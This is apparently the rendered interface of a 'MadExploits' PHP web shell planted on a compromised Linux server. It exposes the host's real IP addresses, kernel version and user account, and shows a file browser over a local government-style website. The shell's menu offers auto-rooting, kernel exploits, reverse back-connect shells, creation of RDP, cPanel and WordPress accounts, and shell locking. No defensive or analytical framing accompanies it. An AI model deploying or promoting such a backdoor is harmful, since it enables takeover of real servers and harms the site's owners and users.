Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.135.186.233
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
cgpunch /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
panchadmin
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
aadesh.php
1.41
KB
-rw-r--r--
about-us.php
1.45
KB
-rw-r--r--
baal-suraksha.php
1.44
KB
-rw-r--r--
cc.php
1.46
KB
-rw-r--r--
error_log
11.21
KB
-rw-r--r--
gram-sabha.php
1.46
KB
-rw-r--r--
mission-vission.php
1.52
KB
-rw-r--r--
our-works.php
1.47
KB
-rw-r--r--
powers-by-act.php
1.45
KB
-rw-r--r--
work-area-old.php
1.44
KB
-rw-r--r--
work-area.php
5.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : baal-suraksha.php
<?php include "includes/header.php";?> <?php $page_name = " बाल सुरक्षा "; $table_name = "bal_suraksha"; ?> <div class="pager-header"> <div class="container"> <div class="page-content"> <h2><?php echo $page_name; ?></h2> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item active"><?php echo $page_name; ?></li> </ol> </div> </div> </div><!-- /Page Header --> <section class="about-section bg-grey bd-bottom padding"> <div class="container"> <div class="row about-wrap"> <div class="col-md-12 xs-padding"> <div class="about-content"> <?php $sql = "SELECT *FROM `$table_name`"; $rows = $connection->query($sql); $ress = $rows->fetch_assoc(); echo $ress["curr"]; ?> </div> </div> </div> </div> </section><!-- /About Section --> <?php include "includes/footer.php";?>
Close